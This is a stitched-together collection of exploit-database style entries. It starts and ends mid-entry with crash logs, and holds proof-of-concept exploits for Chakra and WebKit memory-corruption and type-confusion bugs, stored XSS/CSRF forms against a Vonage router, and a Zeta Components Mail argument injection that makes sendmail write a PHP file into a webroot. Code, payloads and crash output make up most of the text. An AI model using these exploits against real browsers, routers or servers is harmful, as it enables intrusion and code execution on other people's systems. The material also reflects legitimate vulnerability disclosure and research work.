This exception may be expected and handled.
chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41:
00007fff`e2b7c841 8b0c81 mov ecx,dword ptr [rcx+rax*4] ds:0000023b`4a2ea4c4=????????
0:015> k
# Child-SP RetAddr Call Site
00 000000be`563fbba0 00007fff`e2f52e3e chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41
01 000000be`563fbbf0 00007fff`e2e1f9a4 chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::TryGetValue+0x56
02 000000be`563fbc40 00007fff`e2cb58a9 chakra!Windows::Data::Text::IUnicodeCharactersStatics::`vcall'{144}'+0x58fc4
03 000000be`563fbcf0 00007fff`e2db04c8 chakra!Js::JavascriptObject::ChangePrototype+0x109
04 000000be`563fbd30 00007fff`e2dbe863 chakra!Js::JavascriptObject::EntrySetPrototypeOf+0xc8
05 000000be`563fbd80 00007fff`e2c5dfb8 chakra!amd64_CallFunction+0x93
06 000000be`563fbde0 00007fff`e2c610da chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x158
07 000000be`563fbe80 00007fff`e2c67c61 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xaa
08 000000be`563fbf00 00007fff`e2c6436c chakra!Js::InterpreterStackFrame::ProcessProfiled+0x131
09 000000be`563fbf60 00007fff`e2dc1bfd chakra!Js::InterpreterStackFrame::Process+0x12c
0a 000000be`563fbfc0 00007fff`e2d88cd5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x3bd
0b 000000be`563fc310 0000023a`3c412fc2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 000000be`563fc360 00007fff`e2dbe863 0x0000023a`3c412fc2
0d 000000be`563fc390 00007fff`e2ca6113 chakra!amd64_CallFunction+0x93
0e 000000be`563fc3e0 00007fff`e2c52060 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 000000be`563fc440 00007fff`e2c51167 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
10 000000be`563fc530 00007fff`e2d9ec52 chakra!Js::JavascriptFunction::CallRootFunction+0x4b
11 000000be`563fc5a0 00007fff`e2c50fa4 chakra!ScriptSite::CallRootFunction+0x6a
12 000000be`563fc600 00007fff`e2d30c99 chakra!ScriptSite::Execute+0x124
13 000000be`563fc690 00007fff`e2d31fde chakra!ScriptEngine::ExecutePendingScripts+0x1a5
14 000000be`563fc760 00007fff`e2d32271 chakra!ScriptEngine::ParseScriptTextCore+0x436
15 000000be`563fc8b0 00007fff`da0fe8d5 chakra!ScriptEngine::ParseScriptText+0xb1
16 000000be`563fc960 00007fff`da0fe71e edgehtml!CJScript9Holder::ParseScriptText+0x119
17 000000be`563fca00 00007fff`da0fe237 edgehtml!CScriptCollection::ParseScriptText+0x202
18 000000be`563fcae0 00007fff`da0fdb67 edgehtml!CScriptData::CommitCode+0x357
19 000000be`563fcca0 00007fff`da2c50ad edgehtml!CScriptData::Execute+0x20f
1a 000000be`563fcd50 00007fff`da136ad4 edgehtml!CHtmScriptParseCtx::Execute+0x7d
1b 000000be`563fcd80 00007fff`da135ba1 edgehtml!CHtmParseBase::Execute+0x204
1c 000000be`563fce10 00007fff`da2be8cb edgehtml!CHtmPost::Exec+0x1e1
1d 000000be`563fcff0 00007fff`da2be7af edgehtml!CHtmPost::Run+0x2f
1e 000000be`563fd020 00007fff`da2be663 edgehtml!PostManExecute+0x63
1f 000000be`563fd060 00007fff`da2be4fd edgehtml!PostManResume+0xa3
20 000000be`563fd0a0 00007fff`da2ccfb3 edgehtml!CHtmPost::OnDwnChanCallback+0x3d
21 000000be`563fd0f0 00007fff`da2a4ddb edgehtml!CDwnChan::OnMethodCall+0x23
22 000000be`563fd120 00007fff`da163f46 edgehtml!GWndAsyncTask::Run+0x1b
23 000000be`563fd150 00007fff`da280480 edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
24 000000be`563fd220 00007fff`da2802a3 edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
25 000000be`563fd270 00007fff`da164af3 edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
26 000000be`563fd2d0 00007fff`da162fe5 edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
27 000000be`563fd300 00007fff`fb3dbc50 edgehtml!GlobalWndProc+0x125
PoC:
-->
<script>
Object.setPrototypeOf({}, this);
location.reload();
</script>
# Exploit Title: Vonage Home Router – Stored Xss
# Date: 16/11/2017
# Exploit Author: Nu11By73
# Hardware Version: VDV-23: 115
# Software Version: 3.2.11-0.9.40
# CVE : CVE-2017-16843
NewKeyword Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these keywords text box enter: test”><script>alert(1)</script>
5. Click the add keyword button to receive the pop up.
NewDomain Parameter:
1. Login to the router
2. Click advanced setup
3. Click parental controls
4. In the block these websites text box enter: test”><script>alert(1)</script>
5. Click the add domain button to receive the pop up.
Proof of concept code:
NewDomain.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="" / >
<input type="hidden" name="KeywordAction" value="0" />
<input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>
NewKeyword.html
<!—Note: The x and y values will need to be changed accordingly
<html>
<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" / >
<input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / >
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
</html>
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1341&desc=3
Let's start with a switch statement and its IR code for JIT.
JS:
for (let i = 0; i <; 100; i++) {
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IRs before Type Specialization:
s26.var = Ld_A s24.var - "i" #0011 Bailout: #0011 (BailOutExpectingInteger)
BrLt_A $L2, s26.var, s5.var #0070
$L9: #0070
BrGt_A $L2, s26.var, s23.var #0070
$L8: #0070
s28.var = Sub_A s26.var, 2 (0x2).i32 #0070 // Because of the minimum case is 2, subtracting 2 from i. s28 is a temporary variable.
MultiBr ..., s28.var #0070
IRs after Type Specialization:
s52(s26).i32 = Ld_A s51(s24).i32 - "i" #0011
BrLt_I4 $L2, s51(s24).i32, 2 (0x2).i32 #0070
$L9: #0070
BrGt_I4 $L2, s51(s24).i32, 38 (0x26).i32 #0070
$L8: #0070
s53(s28).i32 = Sub_I4 s51(s24).i32, 2 (0x2).i32 #0070
MultiBr ..., s53(s28).i32! #0070
MultiBr instructions' offset operand(s28 in the above) must be of type Int32. If not, type confusion will occur. The way to ensure it is to use BailOutExpectingInteger.
In the above code, "s26" is ensured to be of type Int32 by the bailout. So, the other variables affected by "s26" including the offset variable "s28" are also ensured to be of type Int32.
What I noticed is "s28.var = Sub_A s26.var, 2 (0x2).i32". If we declare a variable "j" with "i - 2", the offset variable "s28" will be replaced with "j" in the CSE phase.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s55(s28).i32 = Sub_I4 s54(s24).i32, 2 (0x2).i32 #0013
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a // BailOutExpectingInteger
BrLt_I4 $L2, s54(s24).i32, 2 (0x2).i32 #0079
BrGt_I4 $L2, s54(s24).i32, 38 (0x26).i32 #0079
MultiBr ..., s55(s28).i32! #0079
The offset variable is replaced with "j" that is not ensured to be of type Int32.
CORRECTION: The bug was that it tried to ensure the type using BailOutExpectingInteger, even if "i" was not always of type Int32. It was bypassed with the CSE phase. So if we created a case where "j" couldn't be of type Int32, type confusion occurred.
JS:
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 39)
i = 'aaaa';
}
IR:
Line 3: let j = i - 2;
Col 9: ^
StatementBoundary #2 #0013
s30[LikelyCanBeTaggedValue_Int].var = Sub_A s26[LikelyCanBeTaggedValue_Int_Number].var, 0x1000000000002.var #0013
s27[LikelyCanBeTaggedValue_Int].var = Ld_A s30[isTempLastUse][LikelyCanBeTaggedValue_Int].var! #0017
Line 4: switch (i) {
Col 9: ^
StatementBoundary #3 #001a
s63(s26).i32 = FromVar s26[LikelyCanBeTaggedValue_Int_Number].var #001a Bailout: #001a (BailOutExpectingInteger)
BrLt_I4 $L4, s63(s26).i32, 2 (0x2).i32 #0079
BrGt_I4 $L4, s63(s26).i32, 38 (0x26).i32 #0079
MultiBr ..., s27[LikelyCanBeTaggedValue_Int].var #0079
It ended up to use "j" of type Var as the offset variable.
PoC:
*/
function opt() {
for (let i = 0; i < 100; i++) {
let j = i - 2;
switch (i) {
case 2:
case 4:
case 6:
case 8:
case 10:
case 12:
case 14:
case 16:
case 18:
case 20:
case 22:
case 24:
case 26:
case 28:
case 30:
case 32:
case 34:
case 36:
case 38:
break;
}
if (i == 90) {
i = 'x';
}
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
/*
Crash Log:
RAX: 0x1
RBX: 0x7ffff7e04824 --> 0x100000000
RCX: 0x3
RDX: 0x7ffff0b20667 (loope 0x7ffff0b2066d)
RSI: 0x80000001
RDI: 0x7ffff0c182a0 --> 0x7ffff6478a10 --> 0x7ffff5986230 (<Js::DynamicObject::Finalize(bool)>: push rbp)
RBP: 0x7fffffff2130 --> 0x7fffffff21b0 --> 0x7fffffff2400 --> 0x7fffffff2480 --> 0x7fffffff24d0 --> 0x7fffffff52f0 (--> ...)
RSP: 0x7fffffff20c0 --> 0x1111015500000002
RIP: 0x7ffff0b204da (mov rdx,QWORD PTR [rdx+r13*8])
R8 : 0x0
R9 : 0x0
R10: 0x7ffff0b20400 (movabs rax,0x555555879018)
R11: 0x206
R12: 0x7fffffff5580 --> 0x7ffff0ba0000 --> 0xeb021a471b4f1a4f
R13: 0x1000000000001 << Var 1
R14: 0x1000000000003
R15: 0x7ffff0c79040 --> 0x7ffff643c050 --> 0x7ffff5521130 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff0b204cb: cmp ecx,0x26
0x7ffff0b204ce: jg 0x7ffff0b204e1
0x7ffff0b204d0: movabs rdx,0x7ffff0b20667
=> 0x7ffff0b204da: mov rdx,QWORD PTR [rdx+r13*8]
0x7ffff0b204de: rex.W jmp rdx
We can simply think as follows.
Before the CSE phase:
Var j = ToVar(i - 2);
int32_t offset = i - 2;
jmp jump_table[offset];
After the CSE phase:
Var j = ToVar(i - 2);
jmp jump_table[j];
*/
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343
Here's a snippet of the method.
void Lowerer::LowerBoundCheck(IR::Instr *const instr)
{
...
if(rightOpnd->IsIntConstOpnd())
{
IntConstType newOffset;
if(!IntConstMath::Add(offset, rightOpnd->AsIntConstOpnd()->GetValue(), &newOffset)) <<--- (a)
{
offset = newOffset;
rightOpnd = nullptr;
offsetOpnd = nullptr;
}
}
...
if(!rightOpnd)
{
rightOpnd = IR::IntConstOpnd::New(offset, TyInt32, func);
}
}
At (a), it uses "IntConstMath::Add" to check integer overflow. But the size of IntConstType equals to the size of pointer, and the "offset" variable is used as a 32-bit integer. So it may fail to check integer overflow on 64-bit system.
PoC:
*/
function f() {
let arr = new Uint32Array(0x1000);
for (let i = 0; i < 0x7fffffff;) {
arr[++i] = 0x1234;
}
}
f();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
The above JavaScript code is JITed as follows:
... CHECKING THE TYPE OF B ...
OP_Memset(a, v, a.length);
b[0] = 2.3023e-320;
But there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of "b" was changed after the "OP_Memset" called.
The PoC shows that it can result in type confusion.
PoC:
*/
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 1000; i++) {
opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
}
let a = new Uint8Array(100);
let b = [1.1, 2.2, 3.3];
opt(a, b, {
valueOf: () => {
b[0] = {};
return 0;
}
});
print(b[0]);
}
main();
Vendor: Zeta Components
module: Mail, <= 1.8.1
Published: November 12nd, 2017
Reported by: Kay
CVE-2017-15806
Overview
Zeta Components are a high quality, general purpose library of loosly coupled components for development of applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It’s possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.
Detail
This vulnerability is on send method in ezcMailMtaTransport class.
In /src/transports/mta/mta_transport.php at line 73, send() method use PHP mail() method to deliver email, while PHP use sendmail as default MTA. When mail() method is called, the 5th parameter is $additionalParameters , this parameter can pass extra param to sendmail. As the code shown, it is assigned by this line:
$additionalParameters = "-f{$mail->returnPath->email}”;
If attacker assign email address like:
'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'
and inject payload in mail body, sendmail will transfer log(-X) into /var/www/html/cache/exploit.php. The resulting file will contain the payload passed in the body of the email, that can then be accessed and run through domainname/cache/exploit.php.
To summary, it is possible if all of these conditions are true:
- you use the ezcMailMtaTransport
- your “sendmail” binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don’t support that argument
- your wwwroot is writable by the user your webserver is running at the input to use for the ezcMailAddress that is assigned to the returnPath property is not properly escaped
PoC
use Mail\mail;
$mail = new ezcMail();
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);
Remediation
Upgrade Mail to 1.8.2
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1367
In the following JavaScript code, both of the print calls must print out "undefined" because of "x" is a formal parameter. But the second print call prints out "function x() { }". This bug may lead to type confusion in JITed code.
function f(x) {
print(x);
{
function x() {
}
}
print(x);
}
The following code in "PreVisitFunction" is used to decide how to optimize arguments.
bool doStackArgsOpt = (!pnode->sxFnc.HasAnyWriteToFormals() || funcInfo->GetIsStrictMode());
"HasAnyWriteToFormals" set by "Parser::BindPidRefsInScope" returns true in the following example code where "x" is formal. But the method can't detect the above buggy case, so it may end up wrongly optimizing arguments.
function f(x) {
x = 1;
}
PoC:
*/
function f(x) {
arguments;
{
function x() {
}
}
}
for (let i = 0; i < 10000; i++)
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1355
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
PoC:
=================================================================
-->
<script>
function jsfuzzer() {
textarea1.setRangeText("foo");
textarea2.autofocus = true;
textarea1.name = "foo";
form.insertBefore(textarea2, form.firstChild);
form.submit();
}
function eventhandler2() {
for(var i=0;i<100;i++) {
var e = document.createElement("input");
form.appendChild(e);
}
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>
<!--
=================================================================
ASan log:
=================================================================
==934==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b9810 at pc 0x000114b6f49c bp 0x7fff511323f0 sp 0x7fff511323e8
READ of size 8 at 0x60c0000b9810 thread T0
==934==WARNING: invalid path to external symbolizer!
==934==WARNING: Failed to use and restart external symbolizer!
#0 0x114b6f49b in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb3749b)
#1 0x114daba4b in WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd73a4b)
#2 0x1157ef370 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitBody(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17b7370)
#3 0x1157ec668 in long long WebCore::IDLOperation<WebCore::JSHTMLFormElement>::call<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitBody(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x17b4668)
#4 0x354389601027 (<unknown module>)
#5 0x122546e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#6 0x122546e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#7 0x12253ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f)
#8 0x1221a3847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847)
#9 0x12212488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a)
#10 0x12173d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731)
#11 0x12173d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2)
#12 0x12173dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13)
#13 0x115276615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615)
#14 0x1156896cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd)
#15 0x1149f5010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010)
#16 0x1149f4ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0)
#17 0x1148d2051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051)
#18 0x1148e1c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f)
#19 0x1147d4b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f)
#20 0x1147cebad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad)
#21 0x114b813ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed)
#22 0x114b7e75c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c)
#23 0x1147ee523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523)
#24 0x114d725d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0)
#25 0x11488f693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693)
#26 0x114850736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736)
#27 0x1142cc047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047)
#28 0x1142c4df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1)
#29 0x116d9c661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661)
#30 0x10f5fa43b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b)
#31 0x10f5fd6d9 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9)
#32 0x10f5fcbc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9)
#33 0x10edee117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117)
#34 0x10ebcd695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695)
#35 0x10ebd6a48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48)
#36 0x122bbe8e3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d228e3)
#37 0x122bbf1b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1)
#38 0x7fff8c5f6320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320)
#39 0x7fff8c5d721c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c)
#40 0x7fff8c5d6715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715)
#41 0x7fff8c5d6113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#42 0x7fff8bb36ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#43 0x7fff8bb36cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#44 0x7fff8bb36b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#45 0x7fff8a0cfa53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#46 0x7fff8a84b7ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#47 0x7fff8a0c43da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#48 0x7fff8a08ee0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#49 0x7fffa1faf8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#50 0x7fffa1fae2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#51 0x10eaca56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#52 0x7fffa1d56234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x60c0000b9810 is located 16 bytes inside of 128-byte region [0x60c0000b9800,0x60c0000b9880)
freed by thread T0 here:
